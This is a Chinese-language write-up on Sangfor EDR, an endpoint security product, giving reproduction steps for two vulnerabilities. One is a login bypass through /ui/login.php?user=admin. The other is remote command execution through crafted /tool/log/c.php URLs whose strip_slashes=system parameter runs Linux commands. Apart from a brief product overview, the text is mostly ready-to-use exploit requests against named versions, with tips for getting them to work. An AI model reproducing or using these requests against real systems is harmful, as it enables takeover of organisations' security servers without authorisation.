1.深信服EDR简介

终端检测响应平台（EDR）是深信服公司提供的一套终端安全解决方案，方案由轻量级的端点安全软件（Agent）和管理平台（MGR）共同组成。
EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查，支持微隔离的访问控制策略统一管理，支持对安全事件的一键隔离处置，以及热点事件IOC的全网威胁定位。
端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服的 EDR产品也支持与AC、SIP、AF、SOC、X-central产品的联动协同响应，形成新一代的安全防护体系。

2.深信服EDR漏洞

2.1.后台任意用户登录漏洞

2.1.1.漏洞描述

攻击者利用该漏洞，登录任意用户。

2.1.2.影响版本

EDR <= v3.2.19

2.1.3.漏洞复现

构建URL：https://IP地址/ui/login.php?user=admin

注意后面的admin是必须存在的用户，也就是说EDR设备上必须存在admin的用户，这样才能直接登录admin，若访问的是一个不存在的用户，那么必然无法登录。

2.2.任意命令执行漏洞

2.2.1.漏洞描述

攻击者利用该漏洞，可向目标服务器发送恶意构造的HTTP请求，从而获得目标服务器的权限，实现远程代码控制执行。

2.2.2.影响版本

EDR v3.2.16
EDR v3.2.17
EDR v3.2.19

2.2.3.漏洞复现

注意这里的话，其实有很多的命令是不能用的，而文件上传后，也会存在无法连接的情况，这个还是需要注意一点。

2.2.3.1.构建URL

这里的url都是构建出来的，后面的id就是命令，根据不同的命令进行执行，注意使用的是Linux命令。

https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&path=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&row=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&limit=id